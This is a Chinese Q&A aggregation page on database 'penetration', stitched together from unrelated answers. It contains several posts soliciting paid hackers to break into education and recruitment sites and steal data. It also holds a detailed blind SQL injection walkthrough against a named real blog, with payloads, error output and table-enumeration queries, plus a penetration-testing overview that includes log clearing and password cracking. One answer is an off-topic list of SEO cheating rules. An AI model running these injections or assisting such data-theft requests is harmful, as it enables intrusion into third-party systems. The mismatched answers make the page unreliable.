滲透資料庫
㈠ 百度黑帽優化、SEO高手,教育網站/人事報名網站入侵,滲透高手資料庫,拿許可權,資料庫竊取資料,先核實後交
答:1.在網頁源代碼中任何位置,故意加入與網頁內容不相關的關鍵詞。
2.在網頁源代碼中任何位置,故意大量重復某些關鍵詞。即使與網頁內容相關的關鍵詞,故意重復也被視為作弊行為。
3.在網頁中加入搜索引擎可識別但用戶看不見的隱藏文字。無論是使用同背景色文字、 超小字型大小文字、文字隱藏層、還是 濫用圖片ALT 等方法,都屬於作弊行為。
4.故意製造大量鏈接指向某一網址的行為。
5.對同一個網址,讓搜索引擎與用戶訪問到不同內容的網頁(包括利用重定向等行為)。
6.作弊行為的定義是針對網站而不是網頁的。一個網站內即使只有一個網頁作弊,該 網站也被認為是有作弊行為。
7.有鏈接指向作弊網站的網站,負連帶責任,也會被認為是作弊(但是,作弊網站上 鏈接指向的網站,不算作弊)。
㈡ 如何靈活地運用SQLInjection做資料庫滲透的一種思路
如今,很多關於mssql資料庫的滲透技巧已不能有效地獲取有用的數據值。比如在一個懷疑是注入點的地方
www.xxxxx.com/blog.asp?id=4
當加入" ' "符號進行注入測試時,
www.xxxxx.com/blog.asp?id=4'
出錯信息是,
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '4? to a column of data type int
我們知道它不對" ' "符號進行過濾。再用如下語句測試,
http //www aquavelvas com/blog.asp?id=4 and 1=1
出錯信息是,
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '4 and 1=1' to a column of data type int
好,再來繼續測試,
http //www aquavelvas com/blog.asp?id=4'%20and%20'1'='1
這次出錯訊息不同了,如下
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ' and '
我們的" ' "符號加對了,再繼續測試,
http://www.aquavelvas.com/blog.asp?id=4'%20and%20user>'0
出錯信息如下,
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ' and user>'
應該是語法不允許直接回值,是不是不能再繼續了呢?想想其他辦法,就看user值的長度吧,
http://www.aquavelvas.com/blog.asp?id=4'%20and%20len(user)>'0
出錯信息是,
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ' and len(user)>'
好,我們知道如果出錯信息是Syntax error...或Either BOF or EOF is True...的話,那語句在邏輯上是錯的;而如果出錯信息是Incorrect syntax...的話,那語句在邏輯上就是對的。當處理len(user)>0,憑著剛才的想法,我們知道在邏輯上這是對的。
我們試試邏輯上錯的語句,
http://www.aquavelvas.com/blog.asp?id=4'%20and%20user%20'1'='2
果然,出錯信息是,
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record
從len(user)>0這語法的基礎上,我們得知user的長度是7,之後再用left(user,1)=a這語法來猜出user名是
thomasa。再用db_name()這個function,我們可猜出資料庫名。
好了,如何猜表名呢?就先猜表名的長度吧,
就用如下語句,
len(select top 1 name from sysobjects where xtype='U')>10
len(select top 1 name from sysobjects where xtype='U')>9
len(select top 1 name from sysobjects where xtype='U')>8
...
(猜表名的工作是很煩人,建議用perl寫個script來玩玩)
再猜表名,
left((select top 1 name from sysobjects where xtype='U'),1)=a
left((select top 1 name from sysobjects where xtype='U'),2)=ab
left((select top 1 name from sysobjects where xtype='U'),3)=abc
...
好了,我們知道第一個表名是'geoipcountrywhois' (知道為什麼我建議寫個perl script吧!)
再繼續猜表名,
len(select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')>10
len(select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')>9
len(select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')>8
...
left((select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')),1)=b
left((select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')),1)=l
left((select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')),1)=o
....
好第二個表名是blog,之後的表名可用('geoipcountrywhois','blog')來繼續猜,然而,這顯然不是好辦法。為什麼我們不進行搜索呢?
如何搜索呢?就用如下的語句吧,
(select count(*) from sysobjects where xtype='U' and name like '%login%')=0
(select count(*) from sysobjects where xtype='U' and name like '%pass%')=0
(select count(*) from sysobjects where xtype='U' and name like '%key%')=0
(記得將" % "這符號換成" %25 "才是正確的輸入)
好了,通過邏輯上對或錯的判斷,我們也可以對資料庫進行滲透,不再局限於回彈顯示值。
希望這思路能開闊注入技術的演變。
㈢ 重金尋求:滲透,入侵資料庫網站/請高手拿數據QQ18070719
重金,也要多點懸賞嘛,,,才顯得有誠意。
㈣ 百度黑帽優化、SEO高手,教育網站/人事報名網站入侵,滲透高手資料庫,拿許可權,資料庫竊取資料
其實要做好網站長久的話 還是用白帽手法好好做一定有效果的 這個是事實哦
㈤ 尋求:滲透,入侵網站資料庫導數據高手
能在齊全點嗎?新手等… 自己下個明小子或者阿D把裡面的信息看下不就知道了 沒看懂你寫的什麼東西,不過是寫資料庫名而已
㈥ 計算機資料庫滲透需要學一些什麼樣子的東西
滲透這門學問實在是太大了,你要滲透一台電腦,那你就要從系統安全和網路安全方面入手,你可以先看一下入侵的藝術,黑客入門新手特訓之類的書籍,修改資料庫的數據這個就是提權的事情了,建議不要這么做,是非法的,黑客並不是一個貶義詞
㈦ 如何進行滲透測試才有可能登錄到資料庫伺服器的遠程終端
一、滲透測試概念
滲透測試 (penetration test)並沒有一個標準的定義,國外一些安全組織達成共識的通用說法是:滲透測試是通過模擬惡意黑客的攻擊方法,來評估計算機網路系統安全的一種評估方法。這個過程包括對系統的任何弱點、技術缺陷或漏洞的主動分析,這個分析是從一個攻擊者可能存在的位置來進行的,並且從這個位置有條件主動利用安全漏洞。
滲透測試還具有的兩個顯著特點是:
滲透測試是一個漸進的並且逐步深入的過程。
滲透測試是選擇不影響業務系統正常運行的攻擊方法進行的測試。
滲透測試完全模擬黑客可能使用的攻擊技術和漏洞發現技術,對目標系統的安全做深入的探測,發現系統最脆弱的環節,能直觀的讓管理員知道自己網路所面臨的問題。所以滲透測試是安全評估的方法之一。
TIPS:安全評估通常包括工具評估、人工評估、顧問訪談、問卷調查、應用評估、管理評估、網路架構評估、滲透測試等。
滲透測試與其他評估方法的區別:
通常評估方法是根據已知信息資產或其他被評估對象,去發現所有相關的安全問題。滲透測試是根據已知可利用的安全漏洞,去發現是否存在相應的信息資產,通常評估方法對評估結果更具有全面性,滲透測試則更注重安全漏洞的嚴重性。
滲透測試一方面可以從攻擊者的角度,檢驗業務系統的安全防護措施是否有效,各項安全策略是否得到貫徹落實;另一方面可以將潛在的安全風險以真實事件的方式凸現出來,從而有助於提高相關人員對安全問題的認識水平。滲透測試結束後,立即進行安全加固,解決測試發現的安全問題,從而有效地防止真實安全事件的發生。
二、滲透測試分類
根據滲透方法和視角分類,滲透測試可以分為——
A、黑箱測試「zero-knowledge testing」/(黑盒子Black Box)
滲透者完全處於對系統一無所知的狀態。除了被測試目標的已知公開信息外,不提供任何其他信息。一般只從組織的外部進行滲透測試。
通常,這種類型的測試,最初的信息獲取來自DNS、Web、Email及各種公開對外的伺服器。
B、白盒測試
測試者可以通過正常渠道向被測單位取得各種資料,包括網路拓撲、員工資料甚至網站或其他程序的代碼片段,也能與單位其他員工進行面對面的溝通。通常包括從組織外部和從組織內部兩種地點進行滲透測試。這類測試的目的是模擬企業內部雇員的越權操作。
C、灰盒子(Gray Box)
介於以上兩者之間
較為隱秘的進行測試。通常,接受滲透測試的單位網路管理部門會收到通知:在某些時間段進行測試。因此能夠檢測網路中出現的變化。
但在隱秘測試中,被測單位也僅有極少數人知曉測試的存在,因此能夠有效地檢驗單位中的信息安全事件監控、響應、恢復做得是否到位。
根據滲透目標分類,滲透測試又可以分為——
1)主機操作系統滲透
windows、solaris、aix、linux、sco、sgi
2)資料庫系統滲透
mssql、oracle、mysql、informix、sybase
3)應用系統滲透
滲透目標提供的各種應用,如asp、cgi、jsp、php等組成的www應用
4)網路設備滲透
各種防火牆、入侵檢測系統、網路設備
三、滲透測試過程
信息收集、分析→制訂滲透方案並實施→前段信息匯總、分析→提升許可權、內部滲透→滲透結果總結→輸出滲透測試報告→提出安全解決建議
TIPS:
時間選擇
為減輕滲透測試對網路和主機的影響,滲透測試時間盡量安排在業務量不大的時段和晚上
策略選擇
為防止滲透測試造成網路和主機的業務中斷,在滲透測試中不使用含有拒絕服務的測試策略
對於不能接受任何可能風險的主機系統,如銀行票據核查系統、電力調度系統等,可選擇如下保守策略:
復制一份目標環境,包括硬體平台、操作系統、資料庫管理系統、應用軟體等。對目標的副本進行滲透測試
授權滲透測試的監測手段
在評估過程中,由於滲透測試的特殊性,用戶可以要求對整體測試流程進行監控
測試方自控:由滲透測試方對本次滲透測試過程中的三方面數據進行完整記錄:操作、響應、分析,最終形成完整有效的滲透測試報告提交給用戶
用戶監控:用於監控有4種形式
全程監控:採用類似ethereal的嗅探軟體進行全程抓包嗅探
擇要監控:對掃描過程不進行錄制,僅僅在安全工程師分析數據後,准備發起滲透前才開啟軟體進行嗅探
主機監控:僅監控受測主機的存活狀態,避免意外情況發生
指定攻擊源:用戶指定由特定攻擊源地址進行攻擊,該源地址的主機由用戶進行進程、網路連接、數據傳輸等多方監控
制定實施方案
實施方案應當由測試方與客戶之間進行溝通協商。一開始測試方提供一份簡單的問卷調查了解客戶對測試的基本接收情況。內容包括但不限於如下:
目標系統介紹、重點保護對象及特性。
是否允許數據破壞?
是否允許阻斷業務正常運行?
測試之前是否應當知會相關部門介面人?
接入方式?外網和內網?
測試是發現問題就算成功,還是盡可能的發現多的問題?
滲透過程是否需要考慮社會工程?
在得到客戶反饋後,由測試方書寫實施方案初稿並提交給客戶,由客戶進行審核。在審核完成後,客戶應當對測試方進行書面委託授權。這里,兩部分文檔分別應當包含實施方案部分和書面委託授權部分:
下面串聯講一講各知識點——
1)不同網段/vlan之間的滲透
從某內/外部網段,嘗試對另一網段/vlan進行滲透。
通常可能用到的技術包括:對網路設備的遠程攻擊;對防火牆的遠程攻擊或規則探測、規避嘗試。
信息的收集和分析伴隨著每一個滲透測試步驟,每一個步驟又有三個組成部分:操作、響應和結果分析。
2)埠掃描
通過對目標地址的tcp/udp埠掃描,確定其所開放的服務的數量和類型,這是所有滲透測試的基礎。
通過埠掃描,可以基本確定一個系統的基本信息,結合安全工程師的經驗可以確定其可能存在,以及被利用的安全弱點,為進行深層次的滲透提供依據。
3)遠程溢出
這是當前出現的頻率最高、威脅最嚴重,同時又是最容易實現的一種滲透方法,一個具有一般網路知識的入侵者就可以在很短的時間內利用現成的工具實現遠程溢出攻擊。
對於防火牆內的系統同樣存在這樣的風險,只要對跨接防火牆內外的一台主機攻擊成功,那麼通過這台主機對防火牆內的主機進行攻擊就易如反掌。
4)口令猜測
口令猜測也是一種出現概率很高的風險,幾乎不需要任何攻擊工具,利用一個簡單的暴力攻擊程序和一個比較完善的字典,就可以猜測口令。
對一個系統賬號的猜測通常包括兩個方面:首先是對用戶名的猜測,其次是對密碼的猜測。
5)本地溢出
指在擁有了一個普通用戶的賬號之後,通過一段特殊的指令代碼獲得管理員許可權的方法。
前提:首先要獲得一個普通用戶密碼。也就是說由於導致本地溢出的一個關鍵條件是設置不當的密碼策略。多年的實踐證明,在經過前期的口令猜測階段獲取的普通賬號登錄系統之後,對系統實施本地溢出攻擊,就能獲取不進行主動安全防禦的系統的控制管理許可權。
6)腳本及應用測試
專門針對web及資料庫伺服器進行。據最新技術統計,腳本安全弱點為當前web系統,尤其是存在動態內容的web系統比較嚴重的 安全弱點之一。
利用腳本相關弱點輕則可以獲取系統其他目錄的訪問許可權,重則將有可能取得系統的控制許可權。因此對於含有動態頁面的web、資料庫等系統,web腳本及應用測試將是必不可少的一個環節。
在web腳本及應用測試中,可能需要檢查的部份包括:
◆檢查應用系統架構,防止用戶繞過系統直接修改資料庫;
◆檢查身份認證模塊,用以防止非法用戶繞過身份認證;
◆檢查資料庫介面模塊,用以防止用戶獲取系統許可權;
◆檢查文件介面模塊,防止用戶獲取系統文件;
◆檢查其他安全威脅;
7)無線測試
中國的無線網路還處於建設時期,但是由於無線網路的部署簡易,在一些大城市的普及率已經很高了。北京和上海的商務區至少80%的地方都可以找到接入點。
通過對無線網路的測試,可以判斷企業區域網安全性,已經成為越來越重要的滲透測試環節。
除了上述的測試手段外,還有一些可能會在滲透測試過程中使用的技術,包括:社交工程學、拒絕服務攻擊,以及中間人攻擊。
8)信息收集
網路信息收集:在這一部還不會直接對被測目標進行掃描,應當先從網路上搜索一些相關信息,包括Google Hacking, Whois查詢, DNS等信息(如果考慮進行社會工程學的話,這里還可以相應從郵件列表/新聞組中獲取目標系統中一些邊緣信息如內部員工帳號組成,身份識別方式,郵件聯系 地址等)。
目標系統信息收集:通過上面一步,我們應當可以簡單的描繪出目標系統的網路結構,如公司網路所在區域,子公司IP地址分布,VPN接入地址等。這里特別要注意一些比較偏門的 HOST名稱地址,如一些backup開頭或者temp開關的域名很可能就是一台備份伺服器,其安全性很可能做的不夠。從獲取的地址列表中進行系統判斷,了解其組織架構及操作系統使用情況。最常用的方法的是目標所有IP網段掃描。
埠/服務信息收集:這一部分已經可以開始直接的掃描操作
9)漏洞掃描
這一步主要針對具體系統目標進行。如通過第一步的信息收集,已經得到了目標系統的IP地址分布及對應的域名,並且我們已經通過一些分析過濾出少許的幾個攻擊目標,這時,我們就可以針對它們進行有針對性的漏洞掃描。這里有幾個方面可以進行:
針對系統層面的工具有:ISS, Nessus, SSS, Retina, 天鏡, 極光
針對WEB應用層面的工具有:AppScan, Acunetix Web Vulnerability Scanner, WebInspect, Nstalker
針對資料庫的工具有:ShadowDatabaseScanner, NGSSQuirreL
針對VOIP方面的工具有:PROTOS c07 sip(在測試中直接用這個工具轟等於找死)以及c07 h225, Sivus, sipsak等。
事實上,每個滲透測試團隊或多或少都會有自己的測試工具包,在漏洞掃描這一塊針對具體應用的工具也比較個性化。
10)漏洞利用
有時候,通過服務/應用掃描後,我們可以跳過漏洞掃描部分,直接到漏洞利用。因為很多情況下我們根據目標服務/應用的版本就可以到一些安全網站上獲取針對該目標系統的漏洞利用代碼,如milw0rm, securityfocus,packetstormsecurity等網站,上面都對應有搜索模塊。實在沒有,我們也可以嘗試在GOOGLE上搜索「應用名稱 exploit」、「應用名稱 vulnerability」等關鍵字。
針對系統方面:metasploit
針對資料庫方面:xoxo
針對Web伺服器方面的工具有:xoxo
11)Web安全測試
Information Gathering:也就是一般的信息泄漏,包括異常情況下的路徑泄漏、文件歸檔查找等
Business logic testing:業務邏輯處理攻擊,很多情況下用於進行業務繞過或者欺騙等等
Authentication Testing:有無驗證碼、有無次數限制等,總之就是看能不能暴力破解或者說容不容易通過認證,比較直接的就是「默認口令」或者弱口令了
Session Management Testing:會話管理攻擊在COOKIE攜帶認證信息時最有效
Data Validation Testing:數據驗證最好理解了,就是SQL Injection和Cross Site Script等等
12)Web測試的工具
目前網上能夠找到許多能夠用於進行Web測試的工具,根據不同的功能分主要有:
1.枚舉(Enumeration): DirBuster, http-dir-enum, wget
2.基於代理測試類工具:paros, webscarab, Burp Suite
針對WebService測試的部分有一些尚不是很成熟的工具,如:wsbang,wschess,wsmap,wsdigger,wsfuzzer
這一部分值得一提的是,很多滲透測試團隊都有著自己的測試工具甚至是0DAY代碼,最常見的是SQL注入工具,現網開發的注入工具(如NBSI等) 目前都是針對中小企業或者是個人站點/資料庫進行的,針對大型目標系統使用的一些相對比較偏門的資料庫系統(如INFORMIX,DB2)等,基本上還不涉及或者說還不夠深入。這時各滲透測試團隊就開發了滿足自身使用習慣的測試工具。
針對無線環境的攻擊有:WifiZoo
13)許可權提升
在前面的一些工作中,你或許已經得到了一些控制許可權,但是對於進一步攻擊來說卻還是不夠。例如:你可能很容易的能夠獲取Oracle資料庫的訪問權 限,或者是得到了UNIX(AIX,HP-UX,SUNOS)的一個基本賬號許可權,但是當你想進行進一步的滲透測試的時候問題就來了。你發現你沒有足夠的 許可權打開一些密碼存儲文件、你沒有辦法安裝一個SNIFFER、你甚至沒有許可權執行一些很基本的命令。這時候你自然而然的就會想到許可權提升這個途徑了。
目前一些企業對於補丁管理是存在很大一部分問題的,他們可能壓根就沒有想過對一些伺服器或者應用進行補丁更新,或者是延時更新。這時候就是滲透測試人員的好機會了。經驗之談:有一般許可權的Oracle賬號或者AIX賬號基本上等於root,因為這就是現實生活
14)密碼破解
有時候,目標系統任何方面的配置都是無懈可擊的,但是並不是說就完全沒辦法進入。很多情況下,往往破壞力最大的攻擊起源於最小的弱點,例如弱口令、目 錄列表、SQL注入繞過論證等等。所以說,對於一些專門的安全技術研究人員來說,這一塊意義不大,但是對於一個滲透測試工程師來說,這一步驟是有必要而且絕大部分情況下是必須的。
目前網路中有一種資源被利用的很廣泛,那就是rainbow table技術,說白了也就是一個HASH對應表,有一些網站提供了該種服務,對外宣稱存儲空間大於多少G,像rainbowcrack更是對外宣稱其數據量已經大於1.3T 囧
15)日誌清除
這里不展開講。
進一步滲透
攻入了DMZ區一般情況下我們也不會獲取多少用價值的信息。為了進一步鞏固戰果,我們需要進行進一步的內網滲透。到這一步就真的算是無所不用其及。 最常用且最有效的方式就是Sniff抓包(可以加上ARP欺騙)。當然,最簡單的你可以翻翻已入侵機器上的一些文件,很可能就包含了你需要的一些連接帳 號。比如說你入侵了一台Web伺服器,那麼絕大部分情況下你可以在頁面的代碼或者某個配置文件中找到連接資料庫的帳號。你也可以打開一些日誌文件看一看。
除此之外,你可以直接回到第二步漏洞掃描來進行。
四、生成報告
生成的報告中應當包含:
1.薄弱點列表清單(按照嚴重等級排序)
2.薄弱點詳細描述(利用方法)
3.解決方法建議
4.參與人員/測試時間/內網/外網
5、測試過程中的風險及規避
滲透測試利用網路安全掃描器、專用安全測試工具和富有經驗的安全工程師的人工經驗對網路中的核心伺服器及重要的網路設備,包括伺服器、網路設備、防火牆等進行非破壞性質的模擬黑客攻擊,目的是侵入系統並獲取機密信息並將入侵的過程和細節產生報告給用戶。
滲透測試和工具掃描可以很好的互相補充。工具掃描具有很好的效率和速度,但是存在一定的誤報率和漏報率,並且不能發現高層次、復雜、並且相互關聯的安全 問題;滲透測試需要投入的人力資源較大、對測試者的專業技能要求很高(滲透測試報告的價值直接依賴於測試者的專業技能),但是非常准確,可以發現邏輯性更強、更深層次的弱點。
當具備滲透測試攻擊經驗的人們站到系統管理員的角度,要保障一個大網的安全時,我們會發現,需要關注的問題是完全不同的:從攻方的視角看,是「攻其一點,不及其餘」,只要找到一點漏洞,就有可能撕開整條戰線;但從守方的視角看,卻發現往往「千里之堤,毀於蟻穴」。因此,需要有好的理論指引,從技術到管理都注重安全,才能使網路固若金湯。
㈧ 如何進行滲透測試才能登陸到資料庫伺服器的遠程終端
測試: 新建一個文本文件,更改擴展名為xx.udl雙擊此文件,
選資料庫類型, 設置ip , 用戶,密碼,
資料庫 可進行連接測試 , 當然對方要開sql服務的 測試成功後
點確定 將這個文件以文本方式打開, 裡面有連接字元串 裝sql 查詢分析器
㈨ 求網路技術高手,黑客入侵,滲透高手資料庫,拿許可權,資料庫竊取數據,QQ158636655
此人不可信 跑單的貨
㈩ 尋找網路高手:滲透高手資料庫,
這個我不太會!